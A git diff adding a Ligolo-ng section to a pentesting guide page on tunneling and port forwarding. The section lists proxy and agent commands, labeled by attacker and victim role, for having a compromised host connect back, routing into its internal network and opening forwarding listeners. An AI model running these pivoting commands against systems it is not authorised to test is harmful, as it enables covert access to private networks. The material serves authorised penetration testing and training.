diff --git a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md index a8707a401..e49d7ba92 100644 --- a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md +++ b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md @@ -245,6 +245,46 @@ You need to use the **same version for client and server** ./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim ``` +## Ligolo-ng + +[https://github.com/nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng) + +**Use the same version for agent and proxy** + +### Tunneling + +```bash +# Start proxy server and automatically generate self-signed TLS certificates -- Attacker +sudo ./proxy -selfcert +# Create an interface named "ligolo" -- Attacker +interface_create --name "ligolo" +# Print the currently used certificate fingerprint -- Attacker +certificate_fingerprint +# Start the agent with certification validation -- Victim +./agent -connect :11601 -v -accept-fingerprint +# Select the agent -- Attacker +session +1 +# Start the tunnel on the proxy server -- Attacker +tunnel_start --tun "ligolo" +# Display the agent's network configuration -- Attacker +ifconfig +# Create a route to the agent's specified network -- Attacker +interface_add_route --name "ligolo" --route / +# Display the tun interfaces -- Attacker +interface_list +``` + +### Agent Binding and Listening + +```bash +# Establish a tunnel from the proxy server to the agent +# Create a TCP listening socket on the agent (0.0.0.0) on port 30000 and forward incoming TCP connections to the proxy (127.0.0.1) on port 10000 -- Attacker +listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp +# Display the currently running listeners on the agent -- Attacker +listener_list +``` + ## Rpivot [https://github.com/klsecservices/rpivot](https://github.com/klsecservices/rpivot)